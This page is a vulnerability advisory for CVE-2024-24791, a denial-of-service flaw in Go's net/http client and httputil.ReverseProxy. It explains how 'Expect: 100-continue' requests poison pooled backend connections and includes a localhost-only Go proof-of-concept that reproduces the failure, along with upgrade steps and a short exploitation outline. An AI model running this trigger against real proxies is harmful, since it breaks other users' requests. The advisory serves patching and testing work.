Go net/http: Denial of Service (CVE-2024-24791)

CVE

This CVE describes a denial-of-service vulnerability in the Go standard library's net/http package. Affected releases are every Go version before 1.21.12 and the 1.22 series from 1.22.0 up to but not including 1.22.5; the fix ships in 1.21.12 and 1.22.5. The defect is in the HTTP/1.1 client: when a request carrying an 'Expect: 100-continue' header is answered not with an interim 100 Continue but directly with a non-informational final status (200 or higher, for example a 403 that rejects an upload before its body is sent), the client mishandles the exchange and leaves the connection in an invalid state, so the next request sent on that connection fails. This becomes remotely triggerable wherever the client is driven by untrusted requests, most directly in a net/http/httputil.ReverseProxy: an attacker sends the proxy requests with 'Expect: 100-continue' that the backend answers with a final status, and each such request poisons one of the proxy's pooled backend connections, causing one subsequent request scheduled on that connection (possibly another user's) to fail. Repeating the cheap request keeps breaking other requests through the proxy, which is the denial of service.
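The following program is added here as an illustration; it is not part of the original page and not the Go project's own test code. It wires up the three parties named above so the behaviour can be observed on whatever toolchain you have: a constructed raw TCP backend that answers every request carrying Expect: 100-continue with 403 without reading the body and without closing the connection, a net/http/httputil.ReverseProxy in front of it, and a client that first sends an Expect: 100-continue upload through the proxy and then a plain GET. The paths /upload and /next, the 'payload' body and the one-second timeouts are arbitrary choices for the example. On a fixed toolchain the follow-up GET returns 200; the failure the advisory describes (one poisoned proxy-to-backend connection) is expected to surface as a 502 Bad Gateway from the proxy on that second request.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"net"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"strings"
	"time"
)

// serveRawBackend is a constructed, deliberately minimal HTTP/1.1 backend on a
// raw TCP listener, so that its wire behaviour is exactly what we want: a
// request carrying "Expect: 100-continue" is rejected with 403 without reading
// or acknowledging its body, and the connection is left open for reuse; every
// other request gets a 200. Answering a 100-continue request with a final
// status is the backend behaviour the advisory describes.
func serveRawBackend(ln net.Listener) {
	for {
		conn, err := ln.Accept()
		if err != nil {
			return // listener closed by the caller
		}
		go func(c net.Conn) {
			defer c.Close()
			br := bufio.NewReader(c)
			for {
				req, err := http.ReadRequest(br)
				if err != nil {
					return // peer closed, or sent something that is not a request
				}
				if req.Header.Get("Expect") != "" {
					// Reject without consuming req.Body and without "Connection: close".
					io.WriteString(c, "HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n")
					continue
				}
				io.WriteString(c, "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\nContent-Length: 2\r\n\r\nok")
			}
		}(conn)
	}
}

// probeExpectContinue wires client -> httputil.ReverseProxy -> raw backend and
// returns the status codes the client sees for (1) an upload carrying
// "Expect: 100-continue" that the backend rejects and (2) a plain GET sent
// through the same proxy immediately afterwards. On a fixed toolchain the
// second call returns 200; the failure mode in the advisory (one poisoned
// proxy-to-backend connection) is expected to surface as a 502 from the proxy.
func probeExpectContinue() (first, second int, err error) {
	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		return 0, 0, err
	}
	defer ln.Close()
	go serveRawBackend(ln)

	// The proxy's outbound Transport must really wait for "100 Continue":
	// with ExpectContinueTimeout == 0 it would send the body at once.
	backendTransport := &http.Transport{ExpectContinueTimeout: time.Second}
	defer backendTransport.CloseIdleConnections()
	proxy := httputil.NewSingleHostReverseProxy(&url.URL{Scheme: "http", Host: ln.Addr().String()})
	proxy.Transport = backendTransport
	proxySrv := httptest.NewServer(proxy)
	defer proxySrv.Close()

	client := &http.Client{Transport: &http.Transport{ExpectContinueTimeout: time.Second}}
	defer client.CloseIdleConnections()

	// (1) The attacker-style request: a body plus "Expect: 100-continue".
	req, err := http.NewRequest(http.MethodPost, proxySrv.URL+"/upload", strings.NewReader("payload"))
	if err != nil {
		return 0, 0, err
	}
	req.Header.Set("Expect", "100-continue")
	resp, err := client.Do(req)
	if err != nil {
		return 0, 0, fmt.Errorf("upload: %w", err)
	}
	io.Copy(io.Discard, resp.Body)
	resp.Body.Close()
	first = resp.StatusCode

	// (2) An unrelated request, as the next user of the proxy would send it.
	resp, err = client.Get(proxySrv.URL + "/next")
	if err != nil {
		return first, 0, fmt.Errorf("follow-up: %w", err)
	}
	io.Copy(io.Discard, resp.Body)
	resp.Body.Close()
	second = resp.StatusCode
	return first, second, nil
}

func main() {
	first, second, err := probeExpectContinue()
	fmt.Printf("Expect: 100-continue upload -> %d, follow-up GET -> %d (err=%v)\n", first, second, err)
}
```

Run it with go run against the toolchain you want to check; the first number should be 403 on any version (that is just the backend's answer being relayed), and the second is the one that matters: 200 means the proxy's backend connection survived the rejected expectation, while a 502 is the proxy failing the next request on a connection the rejected upload left unusable.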

Watch the full video on YouTube: CVE-2024-24791

Remediation and exploitation details

This chain involves the following actors

An attacker who can send HTTP requests to the proxy; the operator of a Go HTTP/1.1 client or net/http/httputil.ReverseProxy built with an affected Go version; and a backend that answers an "Expect: 100-continue" request with a final (non-1xx) status instead of "100 Continue".

The following systems are involved

The Go standard library net/http HTTP/1.1 client, including the Transport used by net/http/httputil.ReverseProxy, in Go versions before 1.21.12 and in 1.22.0 through 1.22.4, together with the backend servers such a proxy forwards to.

Attack entry point

HTTP requests sent to the proxy that carry an "Expect: 100-continue" header and elicit a non-informational response from the backend.

Remediation actions

Upgrade the Go toolchain to 1.21.12 or 1.22.5 (or later) and rebuild and redeploy every affected binary: net/http is part of the standard library, so a fix is only effective once the binary is rebuilt. To find out which toolchain built a deployed binary, run go version -m <binary>, which prints the Go version embedded in its build information.

Exploitation actions

The attacker repeatedly sends requests with "Expect: 100-continue" through the proxy to a backend that rejects them with a final status; each such request leaves one proxy-to-backend connection unusable and makes one subsequent request on that connection fail.

CVE database technical details

CVE ID
CVE-2024-24791
Description
The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail. An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.
Provider
Go
CWE / problem types
CWE-400: Uncontrolled Resource Consumption
Affected Software Versions
Go standard library, net/http (version type: semver)
affected: from 0 up to, but not including, 1.21.12
affected: from 1.22.0-0 up to, but not including, 1.22.5
Date Published
2024-07-02T21:28:25.677Z
Last Updated
2024-10-04T15:02:46.565Z